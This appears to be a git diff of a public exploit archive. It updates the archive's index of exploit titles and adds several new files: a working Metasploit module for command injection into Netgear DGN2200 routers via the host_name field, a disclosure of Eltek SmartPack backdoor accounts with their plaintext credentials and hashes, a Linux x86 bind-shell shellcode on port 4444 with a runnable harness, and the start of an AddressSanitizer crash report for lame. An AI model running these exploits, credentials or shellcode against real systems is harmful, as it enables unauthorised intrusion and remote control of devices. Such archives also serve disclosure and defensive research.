2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 @@ -23042,7 +23051,7 @@ id,file,description,date,author,platform,type,port 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 -11636,platforms/php/webapps/11636.php,"Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 +11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 @@ -24505,8 +24514,8 @@ id,file,description,date,author,platform,type,port 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 -15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 -15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 +15185,platforms/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 +15189,platforms/asp/webapps/15189.txt,"SmarterMail < 7.2.3925 - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 @@ -24782,7 +24791,7 @@ id,file,description,date,author,platform,type,port 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0 15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0 -15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0 +15783,platforms/php/webapps/15783.txt,"PHP-Nuke MaticMarket 2.02 - Local File Inclusion",2010-12-20,xer0x,php,webapps,0 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0 @@ -25819,7 +25828,7 @@ id,file,description,date,author,platform,type,port 18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0 18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 @@ -28732,7 +28741,7 @@ id,file,description,date,author,platform,type,port 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps,0 -26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0 +26428,platforms/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps,0 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 @@ -31030,7 +31039,7 @@ id,file,description,date,author,platform,type,port 30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 -30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 +30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 @@ -33166,7 +33175,7 @@ id,file,description,date,author,platform,type,port 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 -34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 +34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 @@ -34420,7 +34429,7 @@ id,file,description,date,author,platform,type,port 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 @@ -35327,7 +35336,7 @@ id,file,description,date,author,platform,type,port 36613,platforms/php/webapps/36613.txt,"WordPress Plugin Simple Ads Manager - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 36614,platforms/php/webapps/36614.txt,"WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 -36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 +36616,platforms/php/webapps/36616.txt,"phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection",2015-04-02,@u0x,php,webapps,80 36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36618,platforms/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 @@ -35775,7 +35784,7 @@ id,file,description,date,author,platform,type,port 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 -37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 @@ -36794,7 +36803,7 @@ id,file,description,date,author,platform,type,port 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 -39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 +39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 @@ -36946,7 +36955,7 @@ id,file,description,date,author,platform,type,port 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39521,platforms/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 -39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0 +39524,platforms/php/webapps/39524.js,"ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 39536,platforms/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 @@ -37166,7 +37175,7 @@ id,file,description,date,author,platform,type,port 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 -40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 @@ -38071,3 +38080,4 @@ id,file,description,date,author,platform,type,port 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0 42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0 42221,platforms/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,php,webapps,0 +42252,platforms/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",hardware,webapps,0 diff --git a/platforms/cgi/remote/42257.rb b/platforms/cgi/remote/42257.rb new file mode 100755 index 000000000..b1f7e2729 --- /dev/null +++ b/platforms/cgi/remote/42257.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/http' +require "base64" + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection", + 'Description' => %q{ + This module exploits a command injection vulnerablity in NETGEAR + DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request + with valid login details. + }, + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Author' => [ + 'thecarterb', # Metasploit Module + 'SivertPL' # Vuln discovery + ], + 'DefaultTarget' => 0, + 'Privileged' => true, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + [ 'NETGEAR DDGN2200 Router', { } ] + ], + 'References' => + [ + [ 'EDB', '41459'], + [ 'CVE', '2017-6334'] + ], + 'DisclosureDate' => 'Feb 25 2017', + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('USERNAME', [true, 'Username to authenticate with', '']), + OptString.new('PASSWORD', [true, 'Password to authenticate with', '']) + ]) + + register_advanced_options( + [ + OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com']) + ]) + end + + # Requests the login page which tells us the hardware version + def check + res = send_request_cgi({'uri'=>'/'}) + if res.nil? + fail_with(Failure::Unreachable, 'Connection timed out.') + end + # Checks for the `WWW-Authenticate` header in the response + if res.headers["WWW-Authenticate"] + data = res.to_s + marker_one = "Basic realm=\"NETGEAR " + marker_two = "\"" + model = data[/#{marker_one}(.*?)#{marker_two}/m, 1] + vprint_status("Router is a NETGEAR router (#{model})") + model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4'] + if model_numbers.include?(model) + print_good("Router may be vulnerable (NETGEAR #{model})") + return CheckCode::Detected + else + return CheckCode::Safe + end + else + print_error('Router is not a NETGEAR router') + return CheckCode::Safe + end + end + + def exploit + check + + # Convert datastores + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + hostname = datastore['HOSTNAME'] + + vprint_status("Using encoder: #{payload.encoder} ") + print_status('Sending payload...') + + vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)") + + creds_combined = Base64.strict_encode64("#{user}:#{pass}") + vprint_status("Encoded authentication: #{creds_combined}") + + res = send_request_cgi({ + 'uri' => '/dnslookup.cgi', + 'headers' => { + 'Authorization' => "Basic #{creds_combined}" + }, + 'vars_post' => { + 'lookup' => 'Lookup', + 'host_name' => hostname + '; ' + payload.encoded + }}) + + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/42252.txt b/platforms/hardware/webapps/42252.txt new file mode 100755 index 000000000..da18d2b69 --- /dev/null +++ b/platforms/hardware/webapps/42252.txt @@ -0,0 +1,86 @@ +Eltek SmartPack - Backdoor Account + +Author: Saeed reza Zamanian [penetrationtest @ Linkedin] +Product: Eltek SmartPack +Vendor: http://www.eltek.com/ +Product Link : http://www.eltek.com/detail_products.epl?k1=25507&id=1123846 + +About Product: + +The Smartpack controller is a powerful and cost-effective module, developed for monitoring and controlling a wide range of Elte's DC power supply systems. +You operate the system from the front panel, locally via a PC using the PowerSuite PC application, or remotely via modem, Ethernet and the Web. The module then utilizes the USB- or RS-232 ports to interface with a local PC, SNMP or Web adapters. + +Vulnerability Report: +In Eltek Management Section, on following path, some json files (sush as cfgUseraccount1.json to cfgUseraccount10.json) will be called , that disclose some of pre-defined system users. +the json response is containing username and password (hashed in MD5), if you crack the MD5 hashes to plain text you can be able to login in the system. (same as bellow). +Please Note: the users were not note in users manual. + +control:control +status:status + +Path: +system conf>Devuce Settings>User Accounts +----------------------------- +json Path: +http://10.211.7.70/RPC/Eltek/cfgUseraccount1.json +to ..... +http://10.211.7.70/RPC/Eltek/cfgUseraccount10.json +----------------------------- +json responses: + +{ + "jsonrpc": "2.0", + "result": [{ + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1" +, + "Value": 2 + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21" +, + "Value": "control" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21" +, + "Value": "fc5364bf9dbfa34954526becad136d4b" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new +:vString21", + "Value": null + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew +:vString21", + "Value": null + }], + "id": 21 + + +------------------------------------------------------------------------------------------- +{ + "jsonrpc": "2.0", + "result": [{ + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1" +, + "Value": 1 + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21" +, + "Value": "status" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21" +, + "Value": "9acb44549b41563697bb490144ec6258" + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new +:vString21", + "Value": null + }, { + "Path": "SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew +:vString21", + "Value": null + }], + "id": 8 +} + +------------------------------------------------------------------------------------------- + +#EOF \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/42254.c b/platforms/lin_x86/shellcode/42254.c new file mode 100755 index 000000000..18f997c5c --- /dev/null +++ b/platforms/lin_x86/shellcode/42254.c @@ -0,0 +1,98 @@ +/* + +Architecture : x86 +OS : Linux +Author : wetw0rk +ID : SLAE-958 +Shellcode Size : 75 bytes +Bind Port : 4444 +Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; + original payload was 78 bytes and contained 1 NULL. My shellcode + is 75 and contains 0 NULLS ;). + +Original Metasploit Shellcode: + sudo msfvenom -p linux/x86/shell_bind_tcp -b "\x00" -f c --smallest -i 0 + +Test using: + gcc -fno-stack-protector -z execstack tshell.c + +SECTION .text + +global _start + +_start: + ; int socketcall(int call, unsigned long *args) remember to place backwards! + push 102 ; syscall for socketcall() 102 + pop eax ; POP 102 into EAX + cdq ; EDX = 0 (saves space) + push ebx ; PUSH EBX(0) onto stack (IPPROTO_IP = 0) + inc ebx ; INC-rement EBX by 1 + push ebx ; PUSH EBX(1) onto stack (SOCK_STREAM = 1) + push 2 ; PUSH 2 onto stack (AF_INET = 2) + mov ecx,esp ; top of stack contains our arguments save address in ECX + int 80h ; call that kernel!! + + ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) + pop ebx ; POP stack(2 = SYS_BIND = bind()) into EBX + pop esi ; POP stack(1) into ESI we dont need it + push edx ; PUSH EDX(0) onto the stack (INADDR_ANY = 0) + push word 0x5c11 ; PUSH 0x5c11 onto the stack (PORT:4444) + push edx ; PUSH 00 onto the stack + push byte 0x02 ; PUSH 02 onto the stack (AF_INET = 2) + push 16 ; PUSH 16 onto the stack (ADDRLEN = 16) + push ecx ; PUSH ECX(struct pointer) onto the stack + push eax ; PUSH EAX(socket file descriptor) onto stack + mov ecx,esp ; top of stack contains our argument array save it in ECX + mov al,102 ; syscall for socketcall() 102 + int 80h ; call that kernel!! + + ; int listen(int sockfd, int backlog) + mov [ecx+4],eax ; zero out [ECX+4] + mov bl,4 ; MOV (4 = SYS_LISTEN = listen()) into BL + mov al,102 ; make syscall for socketcall() + int 80h ; call the kernel!! + + ; accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) + inc ebx ; EBX(5) = SYS_ACCEPT = accept() + mov al,102 ; make syscall for socketcall() + int 80h ; call the kernel!! + + xchg eax,ebx ; Put socket descriptor in EBX and 0x5 in EAX + pop ecx ; POP 3 into ECX for counter + +loop: + ; int dup2(int oldfd, int newfd) + mov al,63 ; syscall for dup2() + int 80h ; call the kernel!! + dec ecx ; count down to zero + jns loop ; If SF not set, ECX not negative so continue looping + +done: + ; int execve(const char *filename, char *const argv[], char *const envp[]) + push dword 0x68732f2f ; PUSH hs// onto stack + push dword 0x6e69622f ; PUSH nib/ onto stack + mov ebx,esp ; put the address of "/bin//sh" into EBX via ESP + push eax ; PUSH nulls for string termination + mov ecx,esp ; store argv array into ECX via the stack or ESP + mov al,11 ; make execve() syscall or 11 + int 80h ; call then kernel!! + +*/ + +#include +#include + +unsigned char code[]= \ +"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52" +"\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd" +"\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93" +"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} + diff --git a/platforms/linux/dos/42258.txt b/platforms/linux/dos/42258.txt new file mode 100755 index 000000000..40d806446 --- /dev/null +++ b/platforms/linux/dos/42258.txt @@ -0,0 +1,91 @@ +Description: +lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL. + +Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record. + +The complete ASan output of the issue: + +# lame -f -V 9 $FILE out.wav +==27479==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f598d317f20 at pc 0x7f598d2b246b bp 0x7ffe780cf310 sp 0x7ffe780cf308 +READ of size 2 at 0x7f598d317f20 thread T0 + #0 0x7f598d2b246a in II_step_one /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36 + #1 0x7f598d2b246a in decode_layer2_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:375 + #2 0x7f598d29b377 in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:611:13 + #3 0x7f598d298c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12 + #4 0x7f598d259092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11 + #5 0x7f598d25e94a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16 + #6 0x7f598d25e94a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379 + #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11 + #8 0x51e984 in read_samples_mp3 